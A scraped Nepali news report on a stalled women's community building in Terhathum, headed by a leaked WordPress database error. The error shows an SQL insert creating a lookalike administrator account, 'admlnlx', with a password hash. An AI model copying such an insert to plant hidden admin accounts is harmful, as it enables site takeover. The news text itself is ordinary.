WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bne7p5j8.HEev8pebUTAQDXjnyrisI.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-12 19:09:29', '', 'admlnlx', 'admlnlx')
तेह्रथुम,माघ ८ –
तेह्रथुमको थोक्लङ गाविसका महिलाले निर्माण थालेको महिला सामुदायिक भवन बजेट अभावले अलपत्र बनेको छ । महिलाले गाउँस्तरीय कार्यक्रम, बैठक, भेला गर्दा खुला आकासमुनि पाखा, चौरमा बस्न समस्या भएको भन्दै तीन वर्षअघि निर्माण सुरु गरेको भवन पर्याप्त बजेट नहुँदा अलपत्र बनेको हो ।
गाविसको लक्षित वर्ग तर्फको बजेटले निर्माण थालिए पनि थप आशा गरिएका गाविस, जिविस र अन्यत्र कतैबाट पनि बजेट नदिइँदा निर्माणकार्य समयमै सम्पन्न हुन नसकेको महिला अधिकार मञ्चकी अध्यक्ष विष्णुकुमारी कन्दङवाले बताउनुभयो ।
गाविसबाट दिइएको दुई वर्षको बजेटले घडेरी सम्याएर गाह्रो थाल्न मात्रै पुगेको महिला नेतृ देवीमाया भुजेलले बताउनुभयो । ‘हप्तैपिच्छे केही न केही कार्यक्रम पर्छन्, उहाँले भन्नुभयो, ‘तर सबै कार्यक्रम सामुदायिक भवन र विद्यालयमा गर्नुपर्दा असजिलो हुन्छ ।’ कार्यक्रम जुध्दा महिलाका कार्यक्रम बाहिरै गर भन्छन्, हामी मात्रै कत्ति चौरीमा बस्ने रु झरी बादलमा समस्या हुन्छ, भवन बनाऔंँ भनेर लागियो, उहाँले भन्नुभयो, “तर कसैले पनि सहयोग गरेन, भवन निर्माण अलपत्र परेको छ ।”
भवन निर्माणका लागि बजेट माग गरेपनि पहुँच नपुग्दा समस्यामा परेको उहाँले बताउनु भयो । भवन गाउँ पारालिगल, महिला सशक्तिकरण सञ्जाल र महिला अधिकार मन्चले मिलेर निर्माण थालेका हुन् । तर बजेट अभावले निर्माणकार्य नै अलपत्र बनेको छ । यो वर्षको गाविसको महिला लक्षित बजेट पनि सबै भवन निर्माणमै लगाउने तयारी छ ।
वर्षामा झरिले गाह्रो भत्काइदिँदा समस्या हुने गरेको छ । भवन बनाउन सभासदहरुलाई समेत बजेट माग गरिएको तर बेवास्ता भएको महिलाको गुनासो छ । भवन बनाउन अहिलेसम्म पाँच लाख रुपैयाँ खर्च भइसकेको छ ।
अझै रु पाँच लाख बढी रकम लाग्ने अनुमान छ । भवन ढुङ्गा माटोको दुई तले बनाउने लक्ष्य लिइएको छ, तर अहिले पहिलो तला लगाउने समेत तयारी छैन । उनीहरुले भवन बनाउन सहयोग गर्न व्यक्ति संस्था र सम्बन्धित निकाय सबैलाई आग्रह गरेका छन् । – रासस